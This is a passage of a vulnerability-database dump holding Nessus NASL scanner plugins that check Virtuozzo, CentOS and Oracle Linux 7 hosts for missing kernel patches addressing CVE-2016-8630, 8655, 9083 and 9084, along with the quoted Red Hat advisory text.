reference:\"kernel-rt-debug-kvm-debuginfo-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-rt-doc-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-kvm-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-kvm-debuginfo-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-kvm-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-kvm-debuginfo-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:14:13", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-13T00:00:00", "title": "Virtuozzo 7 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "modified": "2017-07-13T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs", "p-cpe:/a:virtuozzo:virtuozzo:kernel-devel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-tools", "cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:kernel-headers", "p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs-devel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-abi-whitelists", "p-cpe:/a:virtuozzo:virtuozzo:kernel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-debug-devel", "p-cpe:/a:virtuozzo:virtuozzo:python-perf", "p-cpe:/a:virtuozzo:virtuozzo:kernel-doc", "p-cpe:/a:virtuozzo:virtuozzo:kernel-debug", "p-cpe:/a:virtuozzo:virtuozzo:perf"], "id": "VIRTUOZZO_VZLSA-2017-0386.NASL", "href": "https://www.tenable.com/plugins/nessus/101431", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101431);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2016-8630\",\n \"CVE-2016-8655\",\n \"CVE-2016-9083\",\n \"CVE-2016-9084\"\n );\n\n script_name(english:\"Virtuozzo 7 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0386)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0386.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?43a5fb2d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0386\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel / kernel-abi-whitelists / kernel-debug / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.10.2.vl7\",\n \"kernel-abi-whitelists-3.10.0-514.10.2.vl7\",\n \"kernel-debug-3.10.0-514.10.2.vl7\",\n \"kernel-debug-devel-3.10.0-514.10.2.vl7\",\n \"kernel-devel-3.10.0-514.10.2.vl7\",\n \"kernel-doc-3.10.0-514.10.2.vl7\",\n \"kernel-headers-3.10.0-514.10.2.vl7\",\n \"kernel-tools-3.10.0-514.10.2.vl7\",\n \"kernel-tools-libs-3.10.0-514.10.2.vl7\",\n \"kernel-tools-libs-devel-3.10.0-514.10.2.vl7\",\n \"perf-3.10.0-514.10.2.vl7\",\n \"python-perf-3.10.0-514.10.2.vl7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:31:01", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-07T00:00:00", "title": "CentOS 7 : kernel (CESA-2017:0386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "modified": "2017-03-07T00:00:00", "cpe": ["p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "p-cpe:/a:centos:centos:kernel-doc", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:kernel-tools-libs-devel", "p-cpe:/a:centos:centos:kernel-tools", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-tools-libs", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2017-0386.NASL", "href": "https://www.tenable.com/plugins/nessus/97558", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0386 and \n# CentOS Errata and Security Advisory 2017:0386 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97558);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"RHSA\", value:\"2017:0386\");\n\n script_name(english:\"CentOS 7 : kernel (CESA-2017:0386)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-March/022324.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6d0d2dd9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8655\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.10.2.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:08", "description": "From Red Hat Security Advisory 2017:0386 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.", "edition": 27, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-03T00:00:00", "title": "Oracle Linux 7 : kernel (ELSA-2017-0386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "modified": "2017-03-03T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-tools", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-tools-libs", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-tools-libs-devel", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2017-0386.NASL", "href": "https://www.tenable.com/plugins/nessus/97506", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:0386 and \n# Oracle Linux Security Advisory ELSA-2017-0386 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97506);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"RHSA\", value:\"2017:0386\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2017-0386)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n 